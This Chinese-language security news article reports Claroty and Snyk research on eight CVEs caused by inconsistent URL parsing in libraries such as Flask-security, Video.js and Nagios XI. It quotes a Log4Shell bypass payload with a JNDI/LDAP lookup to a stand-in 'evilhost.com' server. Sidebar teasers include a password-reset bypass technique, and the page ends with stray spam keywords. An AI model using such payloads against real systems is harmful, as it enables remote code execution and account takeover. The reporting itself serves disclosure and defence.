<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    研究人員在廣泛使用的 URL 解析器庫中發現漏洞

    一顆小胡椒2022-01-11 10:30:15

    日前,有研究人員對 16 個不同的統一資源定位符( URL )解析庫進行調研后,發現了不一致和混亂的情形,它們可以被不法分子用來繞過驗證機制,為眾多攻擊途徑敞開大門。隨后,兩家網絡安全公司 Claroty 和 Synk 聯合開展了深入的分析工作,結果發現,用C 、JavaScript 、 PHP 、 Python 和 Ruby 等語言編寫的許多第三方庫存在 8 個安全漏洞,多個 Web 應用程序使用這些第三方庫。

    發現的8個漏洞包括Belledonne’s SIP Stack(C,CVE-2021-33056)、Video.js(JavaScript,CVE-2021-23414)、Nagios XI(PHP,CVE-2021-37352)、Flask-security(Python,CVE-2021-23385)、Flask-security-too(Python,CVE-2021-32618)、Flask-unchained(Python,CVE-2021-23393)、Flask-User(Python,CVE-2021-23401)、Clearance(Ruby,CVE-2021-23435),所有這些漏洞此后已由各自的維護人員修復。

    研究人員表示:“ URL 解析中的混亂可能導致軟件(比如 Web 應用程序)出現異常行為,可能被威脅分子用來引發拒絕服務攻擊、泄露信息,或可能實施遠程代碼執行攻擊。”由于 URL 是一種用來請求和檢索位于本地或 Web 上資源的基本機制,解析庫如何解釋 URL 請求方面的差異可能會給用戶帶來重大風險。一個典型例子是 2021 年 12 月在 Log4j 日志框架中暴露的 Log4Shell 嚴重漏洞。該漏洞源于攻擊者控制的惡意字符串被評估、并由易受攻擊的應用程序記錄時,導致 JNDI 查詢連接到攻擊者運行的服務器,從而執行任意 Java 代碼。雖然 Apache 軟件基金會( ASF )迅速發布了補丁以修復漏洞,但人們很快發現,輸入精心設計的內容(格式為“ ${jndi:ldap://127.0.0[.] 1#.evilhost.com:1389/a}”),可以繞過緩解措施,再次允許遠程 JNDI 查詢執行代碼。

    研究人員表示:“這種繞過源于在 JNDI 查詢過程中使用了兩個不同的 URL 解析器,一個解析器用于驗證 URL ,另一個用于獲取 URL ;URL 的 Authority 部分也發生變化,這取決于每個解析器如何處理 URL 的 Fragment 部分(#)。” 具體來說,如果輸入作為常規的 HTTP URL 來處理, Authority 部分(域名和端口號的組合)一遇到 fragment 標識符就結束;而作為 LDAP URL 來處理時,解析器會分配整個“127.0.0[.]1#.evilhost.com:1389”作為 Authority ,因為 LDP URL 規范不考慮該 fragment 。

    的確,使用多個解析器是這8個漏洞出現的主要原因之一,還有一個原因是,庫遵循不同的 URL 規范時存在不一致,從而導致了問題,這實際上帶來了可利用的漏洞。不一致的情形多種多樣,如 URL 含有反斜杠(“\”)、不規則數量的斜杠(比如https:///www.example[.]com)或 URL 編碼數據(“%”), 以及 URL 缺少 URL 方案等,這后一種情形可被用來實施遠程代碼執行攻擊,甚至發動拒絕服務( DoS )和開放重定向網絡釣魚攻擊。研究人員表示:“許多實際的攻擊場景可能來自不同的解析原語。”為了保護應用程序免受 URL 解析漏洞的影響,“有必要充分了解整個過程中牽涉哪些解析器,以及解析器之間的差異,了解它們如何解釋不同格式、有誤的 URL 以及它們支持哪些類型的 URL 。”

    網絡安全url
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    ShodanShodan是一款功能強大的OSINT工具,Shodan可以監控和搜索的網絡數據范圍令人震驚。安全分析師可以通過ZoomEye方便地了解網絡資產分布情況及漏洞的危害范圍等信息。此外,它還支持驗證企業的電子郵件賬戶,以識別潛在的數據泄漏威脅。WiGLEWiGLE搜索引擎致力于收集全球各地的Wi-Fi熱點,目前已涵蓋了超過10億個無線網絡。
    周二,微軟宣布將要推出Security Copilot,一款由人工智能驅動的安全分析助手,據說它能夠協助網絡安全團隊快速響應處理威脅、評估報告安全風險。微軟還在其官網上演示了Security Copilot的以下幾種功能:事件響應:識別正在進行的攻擊,評估其規模,并獲取說明,以根據來自真實安全案例的成熟策略開始補救。一次檢查一個資產的環境,以查找違規證據。
    URL黑白名單URL黑白名單用于允許或禁止某些特定的URL,處理簡單直接,白名單允許訪問、黑名單禁止訪問。當用戶訪問的URL隸屬于對應URL分類時,則按該分類的響應動作進行處理。這種機制減少遠程查詢,加快URL過濾處理速度。確保URL過濾不會意外禁止業務正常所需的網站。尤其惡意軟件、釣魚網站必須禁止,降低安全風險。因此應用控制和URL過濾兩者各有應用場景,相輔相成。
    當我們輸入正確的手機號和正確的短信驗證碼,然后進入重置密碼的最后一步,也就是輸入新的密碼輸入密碼后提交到服務端的post數據包需要包含當前用戶的身份信息。修改響應包重置任意賬號密碼:通過手機找回密碼一般需要短信驗證碼驗證,服務端需要告訴客戶端,輸入的驗證碼是否正確。
    網絡安全研究人員和IT管理員對谷歌新的ZIP和MOV互聯網域名提出了擔憂,警告說攻擊者可能利用它們進行網絡釣魚攻擊和惡意軟件傳輸。因此,人們發布含有以.zip和.mov為擴展名的文件名是非常常見的。當BleepingComputer就這些問題聯系谷歌時,他們表示,文件和域名之間的混淆風險是長期存在的,瀏覽器的保護措施已經部署,以保護用戶免受干擾。
    網絡安全頭條
    2023-03-13 10:44:21
    這些有效載荷允許其他攻擊者遠程訪問該設備,并在被攻擊的網絡中進一步傳播最終導致數據被盜。Jenkins根據調查表示,利用這些漏洞可能允許未經身份驗證的攻擊者在受害者的服務器上執行任意代碼,可能導致服務器完全受損。目前,Jenkins已修補漏洞,發布了版本更新。
    作為擁有著10年經驗的滲透安全測試工程師,一路也是從小白歷經磨難成長起來的我,給現在的新手小白一些建
    針對DVWA編寫一個用于輔助SQL注入的工具
    移動設備的端點安全是一種網絡安全措施,允許組織保護其網絡上的所有設備,防止未經授權的訪問其系統。它有助于減少攻擊面,實時檢測和預防威脅,并自動響應安全事件。它使用加密技術防止數據丟失,并使組織能夠快速檢測惡意軟件和其他安全威脅。CASB在保護企業免受云傳播的安全威脅、確保數據隱私和法規遵從方面發揮著越來越重要的作用。
    修補程序管理應包括組織內的所有資產。雖然會造成操作上的不便,但有必要確保業務安全。該政策應由員工閱讀和確認,并應成為新員工入職流程的一部分。注意公共WIFI企業應具有嚴格控制的Wi-Fi系統,并為那些不需要訪問公司資源的人提供訪客網絡。自動鎖定時間應由組織內的高級管理層批準。時刻保持警惕警惕性是保持網絡安全意識的最佳動力之一。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类